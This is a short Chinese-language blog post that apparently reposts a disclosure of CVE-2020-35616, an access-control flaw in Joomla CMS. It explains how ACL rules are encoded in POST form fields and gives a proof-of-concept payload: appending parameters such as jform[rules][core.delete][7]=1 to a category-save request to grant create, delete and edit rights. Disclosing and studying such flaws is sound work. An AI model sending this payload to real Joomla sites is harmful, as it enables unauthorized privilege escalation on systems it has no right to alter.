Joomla CMS 框架 ACL 安全访问控制漏洞(CVE-2020-35616)

# Joomla CMS 框架 ACL 安全访问控制漏洞(CVE-2020-35616)

POST请求表单中的ACL规则集的格式: jform[rules][core.PERMISSION][GROUP_ID]

“`
jform[rules][core.delete][ID]
jform[rules][core.edit][ID]
jform[rules][core.edit.state][ID]
jform[rules][core.edit.own][ID]
“`

如果将这些POST请求参数设置为值1,则基本上将这些特定权限设置为Allowed

**PoC:**

“`
POST administrator/index.php?option={Target Category}



&jform[rules][core.{create|delete|edit}][AttackerID]=1
“`

如上所述,我们希望向组ID为7的管理员授予所有权限。因此,在保存表单时,我们需要附加以下POST数据:

“`
&jform[rules][core.create][7]=1&jform[rules][core.delete][7]=1&jform[rules][core.edit][7]=1&jform[rules][core.edit.state][7]=1&jform[rules][core.edit.own][7]=1
“`

![](/static/lingjiao/media/16096789927812/16096790331190.jpg)

PoC验证视频:
https://youtu.be/AZr6WydbUA0

详细分析文章见:https://blog.securelayer7.net/latest-joomla-exploit-cve-2020-35616-acl-security-vulnerabilities/

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容